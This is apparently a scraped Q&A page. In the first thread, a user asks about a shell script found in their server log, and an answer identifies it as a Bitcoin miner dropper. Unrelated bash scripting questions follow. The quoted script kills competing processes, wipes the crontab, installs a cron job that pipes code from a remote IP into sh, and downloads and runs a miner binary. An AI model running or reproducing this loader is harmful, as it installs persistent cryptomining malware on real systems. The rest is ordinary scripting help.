The code below showed up in my python3 server log, on my Ubuntu 20.04 Linux desktop system. Is it just my suspicious nature, or was this an attempt to hack my computer?
cc=http://31.42.177.123
sys=sysrv005
bit=$(getconf LONG_BIT)
ps aux | grep kthreaddi | grep tmp | awk '{print $2}' | xargs -I % kill -9 %
ps aux | egrep 'sysrv001|sysrv002|sysrv003|sysrv004|network01|network00' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep sysrv | grep -v 0 | awk '{print $2}' | xargs -I % kill -9 %
crontab -r
echo "*/30 * * * * (curl --user-agent curl_cron $cc||wget --user-agent wget_cron -q -O - $cc)|sh" | crontab -
#pkill -9 $sys
get() {
chattr -i $2; rm -rf $2
curl --user-agent curl_ldr$bit -fsSL $1 > $2 || wget --user-agent wget_ldr$bit -q -O - $1 > $2 || php -r "file_put_contents('$2', file_get_contents('$1'));"
chmod +x $2
}
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
ps -fe | grep $sys | grep -v grep; if [ $? -ne 0 ]; then
get 31.210.20.120/sysrvv $sys; ./$sys
fi
Yes it's a Bitcoin Miner.
31.42.177.123/... basically downloads the above shell script, which points to 31.210.20.120 to download the sysrvv file which is a Bitcoin miner.
Related
I want my script to check if it's already running in another instance:
$ cat test.sh
#!/bin/bash
ps -ef | grep -v grep | grep -i "test.sh" | grep bash
ps -ef | grep -v grep | grep -i "test.sh" | grep -c bash
if [ `ps -ef | grep -v grep | grep -i "test.sh" | grep -c bash` -gt 1 ]; then echo "There's another instance running."
else echo "Only this instance is running."
fi
However the output is
$ ./test.sh
noes 9503 7494 0 09:32 pts/1 00:00:00 /bin/bash ./test.sh
1
There's another instance running.
Clearly, 1 is not greater than 1, so why is the if condition triggered?
Thanks
From test man page:
INTEGER1 -gt INTEGER2
INTEGER1 is greater than INTEGER2
So the answer is no, -gt is not triggered when values are equal. In fact, as you can see if you modify the script in this way:
$ cat test.sh
#!/bin/bash
ps -ef | grep -v grep | grep -i "test.sh" | grep bash
ps -ef | grep -v grep | grep -i "test.sh" | grep -c bash
STRINGS=`ps -ef | grep -v grep | grep -i "test.sh"`
echo "$STRINGS"
COUNT=`ps -ef | grep -v grep | grep -i "test.sh" | grep -c bash`
echo $COUNT
if [ `ps -ef | grep -v grep | grep -i "test.sh" | grep -c bash` -gt 1 ]; then echo "There's another instance running."
else echo "Only this instance is running."
fi
You get this:
$ ./test.sh
lucio 5097 4736 0 10:10 pts/2 00:00:00 /bin/bash ./test.sh
1
lucio 5097 4736 0 10:10 pts/2 00:00:00 /bin/bash ./test.sh
lucio 5106 5097 0 10:10 pts/2 00:00:00 /bin/bash ./test.sh
2
There's another instance running.
If you modify the script in this way, it will work:
#!/bin/bash
ps -ef | grep -v grep | grep -i "test.sh" | grep bash
pgrep -c test.sh
if [ $(pgrep -c test.sh) -gt 1 ]; then
echo "There's another instance running."
else
echo "Only this instance is running."
fi
This is the output:
$ ./test.sh
lucio 5197 4736 0 10:17 pts/2 00:00:00 /bin/bash ./test.sh
1
Only this instance is running.
Note the use $() instead of backticks. Check this answer for this change.
tar -x -v -z -f abc.tar.gz -C ~/libs/dl/ | cut -d '/' -f 1 | sort | uniq >> `dirname ~/libs/dl/`/.extracted_dirs
I'm trying to find a number of open file descriptors by user "apache". I would like to exclude ls: /proc/PID/fd: No such file or directory but the GREP exclusing is not working:
# for pid in $(lsof -u apache | awk '{ print $2 }' | uniq); do ls -1 /proc/$pid/fd | grep -v "No"; done | wc -l
ls: /proc/PID/fd: No such file or directory
1944
Try |& grep -v "No such file or directory"
Unlike |, |& will also redirect the error output of ls
Try:
for pid in $(lsof -u apache | tail -n +2 | awk '{ print $2 }' | uniq); do ls -1 /proc/$pid/fd ; done | wc -l
This is my code:
nb_lignes=`wc -l $1 | cut -d " " -f1`
for i in $(seq $(($nb_lignes - 1)) )
do
machine=`head $1 -n $i | tail -1`
machine1=`head $1 -n $nb_lignes | tail -1`
ssh root#$machine -x " scp /home/file.txt root#$machine1:/home && rm -r /home/file.txt"
done
I'd like to verify if file.txt exist in such machine before the scp et rm ,Please i ask how can i modify this script ?
Thank you.
You can use test command: test -f file && scp ...
ssh root#$machine -x " test -f /home/file.txt && scp /home/file.txt
root#$machine1:/home && rm -r /home/file.txt"
This is my bash script:
#!/usr/local/bin/bash -x
touch /usr/local/p
touch /usr/local/rec
DATA_FULL=`date +%Y.%m.%d.%H`
CHECK=`netstat -an | grep ESTAB | egrep '(13001|13002|13003|13004|13061|13099|16001|16002|16003|16004|16061|16099|18001|18002|18003|18004|18061|18099|20001|20002|20003|20004|20061|20099|13000|16000|18000|20000)' | awk '{ print $5 }' | sort -u | wc -l`
netstat -an | grep ESTAB | egrep '(13001|13002|13003|13004|13061|13099|16001|16002|16003|16004|16061|16099|18001|18002|18003|18004|18061|18099|20001|20002|20003|20004|20061|20099|13000|16000|18000|20000)' | awk '{ print $5 }' | sort -u | wc -l > /usr/local/www/p
STAT=`cat /usr/local/www/rec`
if [ "$CHECK" -gt "$STAT" ]; then
echo $CHECK"\n"$DATA_FULL > /usr/local/p
fi
Ofcourse I've runned chmod +x script.sh and then sh script.sh, then I receive the following message: [: : bad number.
Why does it happends?
Run your script using
sh -x script.sh
It'll print every line it executes and the variable output.
Run the netstat command and stat command outside and check.
If these are integer for sure, use this syntax,
if [ "0$(echo $CHECK|tr -d ' ')" -gt "0$(echo $STAT|tr -d ' ')" ];
A simple hack. Only works if $STAT is always either empty or positive number.
Are you sure that both STAT and CHECK are numbers that can be compared with -gt?
probably your /usr/local/www/rec is empty. Try
STAT=`cat /usr/local/www/rec 2>/dev/null || echo 0`
maybe.